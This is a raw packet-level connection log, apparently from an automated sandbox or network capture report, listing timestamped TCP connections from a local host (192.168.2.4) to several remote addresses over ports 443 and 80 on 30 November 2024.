              Nov 30, 2024 00:41:14.971067905 CET49782443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:14.971076965 CET4434978213.107.246.63192.168.2.4
              Nov 30, 2024 00:41:14.971136093 CET49782443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:14.971259117 CET49782443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:14.971270084 CET4434978213.107.246.63192.168.2.4
              Nov 30, 2024 00:41:15.008697033 CET4434977713.107.246.63192.168.2.4
              Nov 30, 2024 00:41:15.008755922 CET4434977713.107.246.63192.168.2.4
              Nov 30, 2024 00:41:15.008825064 CET49777443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:15.008909941 CET49777443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:15.008917093 CET4434977713.107.246.63192.168.2.4
              Nov 30, 2024 00:41:15.008925915 CET49777443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:15.008929968 CET4434977713.107.246.63192.168.2.4
              Nov 30, 2024 00:41:15.010721922 CET49783443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:15.010737896 CET4434978313.107.246.63192.168.2.4
              Nov 30, 2024 00:41:15.010812044 CET49783443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:15.010921955 CET49783443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:15.010934114 CET4434978313.107.246.63192.168.2.4
              Nov 30, 2024 00:41:15.935444117 CET44349778142.250.181.100192.168.2.4
              Nov 30, 2024 00:41:15.935796976 CET49778443192.168.2.4142.250.181.100
              Nov 30, 2024 00:41:15.935813904 CET44349778142.250.181.100192.168.2.4
              Nov 30, 2024 00:41:15.936095953 CET44349778142.250.181.100192.168.2.4
              Nov 30, 2024 00:41:15.936584949 CET49778443192.168.2.4142.250.181.100
              Nov 30, 2024 00:41:15.936636925 CET44349778142.250.181.100192.168.2.4
              Nov 30, 2024 00:41:15.987667084 CET49778443192.168.2.4142.250.181.100
              Nov 30, 2024 00:41:16.661063910 CET4434977913.107.246.63192.168.2.4
              Nov 30, 2024 00:41:16.661650896 CET49779443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:16.661669016 CET4434977913.107.246.63192.168.2.4
              Nov 30, 2024 00:41:16.662142038 CET49779443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:16.662147045 CET4434977913.107.246.63192.168.2.4
              Nov 30, 2024 00:41:16.755717039 CET4434978113.107.246.63192.168.2.4
              Nov 30, 2024 00:41:16.756169081 CET49781443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:16.756195068 CET4434978113.107.246.63192.168.2.4
              Nov 30, 2024 00:41:16.756584883 CET49781443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:16.756588936 CET4434978113.107.246.63192.168.2.4
              Nov 30, 2024 00:41:16.813555002 CET4434978013.107.246.63192.168.2.4
              Nov 30, 2024 00:41:16.813975096 CET49780443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:16.813993931 CET4434978013.107.246.63192.168.2.4
              Nov 30, 2024 00:41:16.814423084 CET49780443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:16.814426899 CET4434978013.107.246.63192.168.2.4
              Nov 30, 2024 00:41:16.829813004 CET4434978213.107.246.63192.168.2.4
              Nov 30, 2024 00:41:16.830101013 CET49782443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:16.830106974 CET4434978213.107.246.63192.168.2.4
              Nov 30, 2024 00:41:16.830451965 CET49782443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:16.830456018 CET4434978213.107.246.63192.168.2.4
              Nov 30, 2024 00:41:16.854984045 CET4434978313.107.246.63192.168.2.4
              Nov 30, 2024 00:41:16.855775118 CET49783443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:16.855798006 CET4434978313.107.246.63192.168.2.4
              Nov 30, 2024 00:41:16.856231928 CET49783443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:16.856236935 CET4434978313.107.246.63192.168.2.4
              Nov 30, 2024 00:41:17.142662048 CET4434977913.107.246.63192.168.2.4
              Nov 30, 2024 00:41:17.142710924 CET4434977913.107.246.63192.168.2.4
              Nov 30, 2024 00:41:17.142764091 CET49779443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:17.142915010 CET49779443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:17.142929077 CET4434977913.107.246.63192.168.2.4
              Nov 30, 2024 00:41:17.142937899 CET49779443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:17.142944098 CET4434977913.107.246.63192.168.2.4
              Nov 30, 2024 00:41:17.145994902 CET49784443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:17.146024942 CET4434978413.107.246.63192.168.2.4
              Nov 30, 2024 00:41:17.146095037 CET49784443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:17.146230936 CET49784443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:17.146244049 CET4434978413.107.246.63192.168.2.4
              Nov 30, 2024 00:41:17.234285116 CET4434978113.107.246.63192.168.2.4
              Nov 30, 2024 00:41:17.234344959 CET4434978113.107.246.63192.168.2.4
              Nov 30, 2024 00:41:17.234397888 CET49781443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:17.234553099 CET49781443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:17.234574080 CET4434978113.107.246.63192.168.2.4
              Nov 30, 2024 00:41:17.234582901 CET49781443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:17.234590054 CET4434978113.107.246.63192.168.2.4
              Nov 30, 2024 00:41:17.237178087 CET49785443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:17.237219095 CET4434978513.107.246.63192.168.2.4
              Nov 30, 2024 00:41:17.237319946 CET49785443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:17.237477064 CET49785443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:17.237489939 CET4434978513.107.246.63192.168.2.4
              Nov 30, 2024 00:41:17.266901970 CET4434978013.107.246.63192.168.2.4
              Nov 30, 2024 00:41:17.266947985 CET4434978013.107.246.63192.168.2.4
              Nov 30, 2024 00:41:17.267071962 CET49780443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:17.267221928 CET49780443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:17.267232895 CET4434978013.107.246.63192.168.2.4
              Nov 30, 2024 00:41:17.267244101 CET49780443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:17.267247915 CET4434978013.107.246.63192.168.2.4
              Nov 30, 2024 00:41:17.269222975 CET49786443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:17.269237041 CET4434978613.107.246.63192.168.2.4
              Nov 30, 2024 00:41:17.269299030 CET49786443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:17.269416094 CET49786443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:17.269427061 CET4434978613.107.246.63192.168.2.4
              Nov 30, 2024 00:41:17.283423901 CET4434978213.107.246.63192.168.2.4
              Nov 30, 2024 00:41:17.283497095 CET4434978213.107.246.63192.168.2.4
              Nov 30, 2024 00:41:17.283540964 CET49782443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:17.283632994 CET49782443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:17.283637047 CET4434978213.107.246.63192.168.2.4
              Nov 30, 2024 00:41:17.283673048 CET49782443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:17.283675909 CET4434978213.107.246.63192.168.2.4
              Nov 30, 2024 00:41:17.285363913 CET49787443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:17.285377979 CET4434978713.107.246.63192.168.2.4
              Nov 30, 2024 00:41:17.285459995 CET49787443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:17.285617113 CET49787443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:17.285626888 CET4434978713.107.246.63192.168.2.4
              Nov 30, 2024 00:41:17.308777094 CET4434978313.107.246.63192.168.2.4
              Nov 30, 2024 00:41:17.308845043 CET4434978313.107.246.63192.168.2.4
              Nov 30, 2024 00:41:17.308895111 CET49783443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:17.309000015 CET49783443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:17.309010983 CET4434978313.107.246.63192.168.2.4
              Nov 30, 2024 00:41:17.309037924 CET49783443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:17.309042931 CET4434978313.107.246.63192.168.2.4
              Nov 30, 2024 00:41:17.310626030 CET49788443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:17.310655117 CET4434978813.107.246.63192.168.2.4
              Nov 30, 2024 00:41:17.310750008 CET49788443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:17.310862064 CET49788443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:17.310875893 CET4434978813.107.246.63192.168.2.4
              Nov 30, 2024 00:41:18.967187881 CET4434978413.107.246.63192.168.2.4
              Nov 30, 2024 00:41:18.967740059 CET49784443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:18.967761040 CET4434978413.107.246.63192.168.2.4
              Nov 30, 2024 00:41:18.968218088 CET49784443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:18.968221903 CET4434978413.107.246.63192.168.2.4
              Nov 30, 2024 00:41:19.012394905 CET4434978713.107.246.63192.168.2.4
              Nov 30, 2024 00:41:19.012864113 CET49787443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:19.012896061 CET4434978713.107.246.63192.168.2.4
              Nov 30, 2024 00:41:19.013442993 CET49787443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:19.013447046 CET4434978713.107.246.63192.168.2.4
              Nov 30, 2024 00:41:19.024811029 CET4434978513.107.246.63192.168.2.4
              Nov 30, 2024 00:41:19.025161028 CET49785443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:19.025175095 CET4434978513.107.246.63192.168.2.4
              Nov 30, 2024 00:41:19.025696993 CET49785443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:19.025701046 CET4434978513.107.246.63192.168.2.4
              Nov 30, 2024 00:41:19.081336975 CET4972480192.168.2.4199.232.210.172
              Nov 30, 2024 00:41:19.099759102 CET4434978813.107.246.63192.168.2.4
              Nov 30, 2024 00:41:19.100275993 CET49788443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:19.100291014 CET4434978813.107.246.63192.168.2.4
              Nov 30, 2024 00:41:19.100928068 CET49788443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:19.100933075 CET4434978813.107.246.63192.168.2.4
              Nov 30, 2024 00:41:19.117132902 CET4434978613.107.246.63192.168.2.4
              Nov 30, 2024 00:41:19.117429018 CET49786443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:19.117446899 CET4434978613.107.246.63192.168.2.4
              Nov 30, 2024 00:41:19.117746115 CET49786443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:19.117750883 CET4434978613.107.246.63192.168.2.4
              Nov 30, 2024 00:41:19.203350067 CET8049724199.232.210.172192.168.2.4
              Nov 30, 2024 00:41:19.203402042 CET4972480192.168.2.4199.232.210.172
              Nov 30, 2024 00:41:19.415363073 CET4434978413.107.246.63192.168.2.4
              Nov 30, 2024 00:41:19.415417910 CET4434978413.107.246.63192.168.2.4
              Nov 30, 2024 00:41:19.415467978 CET49784443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:19.415714979 CET49784443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:19.415730000 CET4434978413.107.246.63192.168.2.4
              Nov 30, 2024 00:41:19.415744066 CET49784443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:19.415749073 CET4434978413.107.246.63192.168.2.4
              Nov 30, 2024 00:41:19.418920994 CET49789443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:19.418956995 CET4434978913.107.246.63192.168.2.4
              Nov 30, 2024 00:41:19.419028997 CET49789443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:19.419157982 CET49789443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:19.419167995 CET4434978913.107.246.63192.168.2.4
              Nov 30, 2024 00:41:19.454243898 CET4434978713.107.246.63192.168.2.4
              Nov 30, 2024 00:41:19.454313040 CET4434978713.107.246.63192.168.2.4
              Nov 30, 2024 00:41:19.454364061 CET49787443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:19.454467058 CET49787443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:19.454484940 CET4434978713.107.246.63192.168.2.4
              Nov 30, 2024 00:41:19.454493999 CET49787443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:19.454499006 CET4434978713.107.246.63192.168.2.4
              Nov 30, 2024 00:41:19.456995964 CET49790443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:19.457019091 CET4434979013.107.246.63192.168.2.4
              Nov 30, 2024 00:41:19.457078934 CET49790443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:19.457278013 CET49790443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:19.457292080 CET4434979013.107.246.63192.168.2.4
              Nov 30, 2024 00:41:19.471796989 CET4434978513.107.246.63192.168.2.4
              Nov 30, 2024 00:41:19.471854925 CET4434978513.107.246.63192.168.2.4
              Nov 30, 2024 00:41:19.471899033 CET49785443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:19.472004890 CET49785443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:19.472011089 CET4434978513.107.246.63192.168.2.4
              Nov 30, 2024 00:41:19.472018003 CET49785443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:19.472021103 CET4434978513.107.246.63192.168.2.4
              Nov 30, 2024 00:41:19.474216938 CET49791443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:19.474231958 CET4434979113.107.246.63192.168.2.4
              Nov 30, 2024 00:41:19.474286079 CET49791443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:19.474433899 CET49791443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:19.474440098 CET4434979113.107.246.63192.168.2.4
              Nov 30, 2024 00:41:19.546873093 CET4434978813.107.246.63192.168.2.4
              Nov 30, 2024 00:41:19.546938896 CET4434978813.107.246.63192.168.2.4
              Nov 30, 2024 00:41:19.546993971 CET49788443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:19.547163010 CET49788443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:19.547172070 CET4434978813.107.246.63192.168.2.4
              Nov 30, 2024 00:41:19.547195911 CET49788443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:19.547200918 CET4434978813.107.246.63192.168.2.4
              Nov 30, 2024 00:41:19.549263000 CET49792443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:19.549287081 CET4434979213.107.246.63192.168.2.4
              Nov 30, 2024 00:41:19.549345016 CET49792443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:19.549535036 CET49792443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:19.549546957 CET4434979213.107.246.63192.168.2.4
              Nov 30, 2024 00:41:19.574306011 CET4434978613.107.246.63192.168.2.4
              Nov 30, 2024 00:41:19.574368954 CET4434978613.107.246.63192.168.2.4
              Nov 30, 2024 00:41:19.574408054 CET49786443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:19.574525118 CET49786443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:19.574525118 CET49786443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:19.574532032 CET4434978613.107.246.63192.168.2.4
              Nov 30, 2024 00:41:19.574541092 CET4434978613.107.246.63192.168.2.4
              Nov 30, 2024 00:41:19.576575994 CET49793443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:19.576595068 CET4434979313.107.246.63192.168.2.4
              Nov 30, 2024 00:41:19.576654911 CET49793443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:19.576792002 CET49793443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:19.576803923 CET4434979313.107.246.63192.168.2.4
              Nov 30, 2024 00:41:19.940545082 CET4975480192.168.2.468.233.44.128
              Nov 30, 2024 00:41:19.956278086 CET4975380192.168.2.468.233.44.128
              Nov 30, 2024 00:41:19.971739054 CET4975280192.168.2.468.233.44.128
              Nov 30, 2024 00:41:20.060569048 CET804975468.233.44.128192.168.2.4
              Nov 30, 2024 00:41:20.076306105 CET804975368.233.44.128192.168.2.4
              Nov 30, 2024 00:41:20.091727972 CET804975268.233.44.128192.168.2.4
              Nov 30, 2024 00:41:20.534338951 CET4975780192.168.2.468.233.44.128
              Nov 30, 2024 00:41:20.534349918 CET4975680192.168.2.468.233.44.128
              Nov 30, 2024 00:41:20.655586004 CET804975768.233.44.128192.168.2.4
              Nov 30, 2024 00:41:20.655626059 CET804975668.233.44.128192.168.2.4
              Nov 30, 2024 00:41:21.150423050 CET4434978913.107.246.63192.168.2.4
              Nov 30, 2024 00:41:21.151094913 CET49789443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:21.151110888 CET4434978913.107.246.63192.168.2.4
              Nov 30, 2024 00:41:21.151490927 CET49789443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:21.151495934 CET4434978913.107.246.63192.168.2.4
              Nov 30, 2024 00:41:21.174869061 CET4975880192.168.2.468.233.44.128
              Nov 30, 2024 00:41:21.241132021 CET4434979013.107.246.63192.168.2.4
              Nov 30, 2024 00:41:21.241605043 CET49790443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:21.241627932 CET4434979013.107.246.63192.168.2.4
              Nov 30, 2024 00:41:21.242038965 CET49790443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:21.242043972 CET4434979013.107.246.63192.168.2.4
              Nov 30, 2024 00:41:21.257757902 CET4434979113.107.246.63192.168.2.4
              Nov 30, 2024 00:41:21.258038998 CET49791443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:21.258049965 CET4434979113.107.246.63192.168.2.4
              Nov 30, 2024 00:41:21.258363962 CET49791443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:21.258368015 CET4434979113.107.246.63192.168.2.4
              Nov 30, 2024 00:41:21.272257090 CET4434979213.107.246.63192.168.2.4
              Nov 30, 2024 00:41:21.272603035 CET49792443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:21.272620916 CET4434979213.107.246.63192.168.2.4
              Nov 30, 2024 00:41:21.272979975 CET49792443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:21.272984982 CET4434979213.107.246.63192.168.2.4
              Nov 30, 2024 00:41:21.284240961 CET4976280192.168.2.468.233.44.128
              Nov 30, 2024 00:41:21.296891928 CET804975868.233.44.128192.168.2.4
              Nov 30, 2024 00:41:21.299875021 CET4976380192.168.2.468.233.44.128
              Nov 30, 2024 00:41:21.315500021 CET4976180192.168.2.468.233.44.128
              Nov 30, 2024 00:41:21.315504074 CET4976080192.168.2.468.233.44.128
              Nov 30, 2024 00:41:21.331101894 CET4975980192.168.2.468.233.44.128
              Nov 30, 2024 00:41:21.364912987 CET4434979313.107.246.63192.168.2.4
              Nov 30, 2024 00:41:21.365489960 CET49793443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:21.365514040 CET4434979313.107.246.63192.168.2.4
              Nov 30, 2024 00:41:21.365977049 CET49793443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:21.365982056 CET4434979313.107.246.63192.168.2.4
              Nov 30, 2024 00:41:21.405514956 CET804976268.233.44.128192.168.2.4
              Nov 30, 2024 00:41:21.422070026 CET804976368.233.44.128192.168.2.4
              Nov 30, 2024 00:41:21.437143087 CET804976168.233.44.128192.168.2.4
              Nov 30, 2024 00:41:21.437153101 CET804976068.233.44.128192.168.2.4
              Nov 30, 2024 00:41:21.453171015 CET804975968.233.44.128192.168.2.4
              Nov 30, 2024 00:41:21.534348011 CET4975580192.168.2.468.233.44.128
              Nov 30, 2024 00:41:21.588757038 CET4434978913.107.246.63192.168.2.4
              Nov 30, 2024 00:41:21.588814020 CET4434978913.107.246.63192.168.2.4
              Nov 30, 2024 00:41:21.588876009 CET49789443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:21.589119911 CET49789443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:21.589137077 CET4434978913.107.246.63192.168.2.4
              Nov 30, 2024 00:41:21.589148998 CET49789443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:21.589154005 CET4434978913.107.246.63192.168.2.4
              Nov 30, 2024 00:41:21.592325926 CET49794443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:21.592349052 CET4434979413.107.246.63192.168.2.4
              Nov 30, 2024 00:41:21.592451096 CET49794443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:21.592626095 CET49794443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:21.592637062 CET4434979413.107.246.63192.168.2.4
              Nov 30, 2024 00:41:21.656702042 CET804975568.233.44.128192.168.2.4
              Nov 30, 2024 00:41:21.689441919 CET4434979013.107.246.63192.168.2.4
              Nov 30, 2024 00:41:21.689511061 CET4434979013.107.246.63192.168.2.4
              Nov 30, 2024 00:41:21.689568996 CET49790443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:21.691286087 CET49790443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:21.691297054 CET4434979013.107.246.63192.168.2.4
              Nov 30, 2024 00:41:21.691308975 CET49790443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:21.691318035 CET4434979013.107.246.63192.168.2.4
              Nov 30, 2024 00:41:21.697942972 CET49795443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:21.697999001 CET4434979513.107.246.63192.168.2.4
              Nov 30, 2024 00:41:21.698112965 CET49795443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:21.698245049 CET49795443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:21.698259115 CET4434979513.107.246.63192.168.2.4
              Nov 30, 2024 00:41:21.704828978 CET4434979113.107.246.63192.168.2.4
              Nov 30, 2024 00:41:21.704884052 CET4434979113.107.246.63192.168.2.4
              Nov 30, 2024 00:41:21.704931021 CET49791443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:21.705116987 CET49791443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:21.705127954 CET4434979113.107.246.63192.168.2.4
              Nov 30, 2024 00:41:21.705138922 CET49791443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:21.705146074 CET4434979113.107.246.63192.168.2.4
              Nov 30, 2024 00:41:21.707612038 CET49796443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:21.707627058 CET4434979613.107.246.63192.168.2.4
              Nov 30, 2024 00:41:21.707712889 CET49796443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:21.707818985 CET49796443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:21.707832098 CET4434979613.107.246.63192.168.2.4
              Nov 30, 2024 00:41:21.712327003 CET4434979213.107.246.63192.168.2.4
              Nov 30, 2024 00:41:21.712404013 CET4434979213.107.246.63192.168.2.4
              Nov 30, 2024 00:41:21.712456942 CET49792443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:21.712497950 CET49792443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:21.712507010 CET4434979213.107.246.63192.168.2.4
              Nov 30, 2024 00:41:21.712539911 CET49792443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:21.712544918 CET4434979213.107.246.63192.168.2.4
              Nov 30, 2024 00:41:21.714267969 CET49797443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:21.714289904 CET4434979713.107.246.63192.168.2.4
              Nov 30, 2024 00:41:21.714358091 CET49797443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:21.714454889 CET49797443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:21.714466095 CET4434979713.107.246.63192.168.2.4
              Nov 30, 2024 00:41:21.813034058 CET4434979313.107.246.63192.168.2.4
              Nov 30, 2024 00:41:21.813074112 CET4434979313.107.246.63192.168.2.4
              Nov 30, 2024 00:41:21.813215971 CET49793443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:21.813272953 CET49793443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:21.813285112 CET4434979313.107.246.63192.168.2.4
              Nov 30, 2024 00:41:21.813294888 CET49793443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:21.813298941 CET4434979313.107.246.63192.168.2.4
              Nov 30, 2024 00:41:21.815593958 CET49798443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:21.815603018 CET4434979813.107.246.63192.168.2.4
              Nov 30, 2024 00:41:21.815671921 CET49798443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:21.815820932 CET49798443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:21.815830946 CET4434979813.107.246.63192.168.2.4
              Nov 30, 2024 00:41:23.224245071 CET4434979513.107.246.63192.168.2.4
              Nov 30, 2024 00:41:23.224729061 CET49795443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:23.224754095 CET4434979513.107.246.63192.168.2.4
              Nov 30, 2024 00:41:23.225203037 CET49795443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:23.225212097 CET4434979513.107.246.63192.168.2.4
              Nov 30, 2024 00:41:23.301570892 CET4434979713.107.246.63192.168.2.4
              Nov 30, 2024 00:41:23.301980972 CET49797443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:23.301995993 CET4434979713.107.246.63192.168.2.4
              Nov 30, 2024 00:41:23.302398920 CET49797443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:23.302403927 CET4434979713.107.246.63192.168.2.4
              Nov 30, 2024 00:41:23.311029911 CET4434979413.107.246.63192.168.2.4
              Nov 30, 2024 00:41:23.311305046 CET49794443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:23.311335087 CET4434979413.107.246.63192.168.2.4
              Nov 30, 2024 00:41:23.311641932 CET49794443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:23.311645985 CET4434979413.107.246.63192.168.2.4
              Nov 30, 2024 00:41:23.531248093 CET4434979813.107.246.63192.168.2.4
              Nov 30, 2024 00:41:23.531904936 CET49798443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:23.531925917 CET4434979813.107.246.63192.168.2.4
              Nov 30, 2024 00:41:23.532403946 CET49798443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:23.532407999 CET4434979813.107.246.63192.168.2.4
              Nov 30, 2024 00:41:23.604511976 CET4434979613.107.246.63192.168.2.4
              Nov 30, 2024 00:41:23.604897976 CET49796443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:23.604906082 CET4434979613.107.246.63192.168.2.4
              Nov 30, 2024 00:41:23.605298042 CET49796443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:23.605302095 CET4434979613.107.246.63192.168.2.4
              Nov 30, 2024 00:41:23.663979053 CET4434979513.107.246.63192.168.2.4
              Nov 30, 2024 00:41:23.664046049 CET4434979513.107.246.63192.168.2.4
              Nov 30, 2024 00:41:23.664108038 CET49795443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:23.664307117 CET49795443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:23.664321899 CET4434979513.107.246.63192.168.2.4
              Nov 30, 2024 00:41:23.664331913 CET49795443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:23.664336920 CET4434979513.107.246.63192.168.2.4
              Nov 30, 2024 00:41:23.667444944 CET49799443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:23.667474031 CET4434979913.107.246.63192.168.2.4
              Nov 30, 2024 00:41:23.667556047 CET49799443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:23.667727947 CET49799443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:23.667740107 CET4434979913.107.246.63192.168.2.4
              Nov 30, 2024 00:41:23.749187946 CET4434979413.107.246.63192.168.2.4
              Nov 30, 2024 00:41:23.749244928 CET4434979413.107.246.63192.168.2.4
              Nov 30, 2024 00:41:23.749332905 CET49794443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:23.749591112 CET49794443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:23.749604940 CET4434979413.107.246.63192.168.2.4
              Nov 30, 2024 00:41:23.749614000 CET49794443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:23.749619961 CET4434979413.107.246.63192.168.2.4
              Nov 30, 2024 00:41:23.752780914 CET49800443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:23.752809048 CET4434980013.107.246.63192.168.2.4
              Nov 30, 2024 00:41:23.752895117 CET49800443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:23.753083944 CET49800443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:23.753096104 CET4434980013.107.246.63192.168.2.4
              Nov 30, 2024 00:41:23.753304005 CET4434979713.107.246.63192.168.2.4
              Nov 30, 2024 00:41:23.753381014 CET4434979713.107.246.63192.168.2.4
              Nov 30, 2024 00:41:23.753426075 CET49797443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:23.753504992 CET49797443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:23.753521919 CET4434979713.107.246.63192.168.2.4
              Nov 30, 2024 00:41:23.753531933 CET49797443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:23.753536940 CET4434979713.107.246.63192.168.2.4
              Nov 30, 2024 00:41:23.755573034 CET49801443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:23.755599976 CET4434980113.107.246.63192.168.2.4
              Nov 30, 2024 00:41:23.755673885 CET49801443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:23.755820036 CET49801443192.168.2.413.107.246.63
              Nov 30, 2024 00:41:23.755831957 CET4434980113.107.246.63192.168.2.4
              Nov 30, 2024 00:41:23.970155001 CET4434979813.107.246.63192.168.2.4
              Nov 30, 2024 00:41:23.970201969 CET4434979813.107.246.63192.168.2.4
              Nov 30, 2024 00:41:23.970273018 CET49798443192.168.2.413.107.246.63
